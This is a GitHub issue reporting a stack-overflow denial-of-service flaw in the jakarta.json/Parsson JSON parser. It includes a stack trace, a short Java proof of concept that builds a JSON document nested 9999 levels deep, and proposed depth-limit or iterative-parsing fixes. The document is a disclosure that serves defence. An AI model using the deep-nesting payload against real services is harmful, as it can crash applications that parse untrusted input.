search

eclipse-ee4j / parsson

Parsson Project
Other
10 stars 21 forks source link

Stack overflow error caused by jakarta.json parsing of untrusted JSON String #91

Closed lukasj closed 1 year ago

lukasj commented 1 year ago

Stack overflow error caused by jakarta.json parsing of untrusted JSON String

Description

Using jakarta.json to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

Error Log

Exception in thread "main" java.lang.StackOverflowError
    at org.glassfish.json.JsonTokenizer.nextToken(JsonTokenizer.java:333)
    at org.glassfish.json.JsonParserImpl$ObjectContext.getNextEvent(JsonParserImpl.java:459)
    at org.glassfish.json.JsonParserImpl.next(JsonParserImpl.java:369)
    at org.glassfish.json.JsonParserImpl.getObject(JsonParserImpl.java:328)
    at org.glassfish.json.JsonParserImpl.getValue(JsonParserImpl.java:175)
    at org.glassfish.json.JsonParserImpl.getObject(JsonParserImpl.java:334)
    at org.glassfish.json.JsonParserImpl.getValue(JsonParserImpl.java:175)
    at org.glassfish.json.JsonParserImpl.getObject(JsonParserImpl.java:334)
    at org.glassfish.json.JsonParserImpl.getValue(JsonParserImpl.java:175)
    at org.glassfish.json.JsonParserImpl.getObject(JsonParserImpl.java:334)
    at org.glassfish.json.JsonParserImpl.getValue(JsonParserImpl.java:175)
    at org.glassfish.json.JsonParserImpl.getObject(JsonParserImpl.java:334)
    at org.glassfish.json.JsonParserImpl.getValue(JsonParserImpl.java:175)
    at org.glassfish.json.JsonParserImpl.getObject(JsonParserImpl.java:334)
    at org.glassfish.json.JsonParserImpl.getValue(JsonParserImpl.java:175)
    at org.glassfish.json.JsonParserImpl.getObject(JsonParserImpl.java:334)
    at org.glassfish.json.JsonParserImpl.getValue(JsonParserImpl.java:175)
    at org.glassfish.json.JsonParserImpl.getObject(JsonParserImpl.java:334)
    at org.glassfish.json.JsonParserImpl.getValue(JsonParserImpl.java:175)
    at org.glassfish.json.JsonParserImpl.getObject(JsonParserImpl.java:334)
    at org.glassfish.json.JsonParserImpl.getValue(JsonParserImpl.java:175)
    at org.glassfish.json.JsonParserImpl.getObject(JsonParserImpl.java:334)
    at org.glassfish.json.JsonParserImpl.getValue(JsonParserImpl.java:175)
    at org.glassfish.json.JsonParserImpl.getObject(JsonParserImpl.java:334)
    at org.glassfish.json.JsonParserImpl.getValue(JsonParserImpl.java:175)
    at org.glassfish.json.JsonParserImpl.getObject(JsonParserImpl.java:334)

PoC

        <dependency>
            <groupId>org.glassfish</groupId>
            <artifactId>jakarta.json</artifactId>
            <version>2.0.1</version>
        </dependency>
import org.glassfish.json.JsonUtil;

/**
 * PoC
 *
 * @since 1.0.0
 */
public class PoC {
    public final static int TOO_DEEP_NESTING = 9999;
    public final static String TOO_DEEP_Array = _nestedDoc(TOO_DEEP_NESTING, "[ ", "] ", "1");
    public final static String TOO_DEEP_Object = "{" + _nestedDoc(TOO_DEEP_NESTING, "\"a\": { ", "} ", "1") + "}";

    public static String _nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting * (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\n");
            }
        }
        sb.append("\n").append(content).append("\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\n");
            }
        }
        return sb.toString();
    }
    public static void main(String[] args) {
        JsonUtil.toJson(TOO_DEEP_Object);
    }
}

Rectification Solution

  1. Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)

  2. Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.((https://github.com/google/gson/commit/2d01d6a20f39881c692977564c1ea591d9f39027))

original source: https://github.com/jakartaee/jsonp-api/issues/398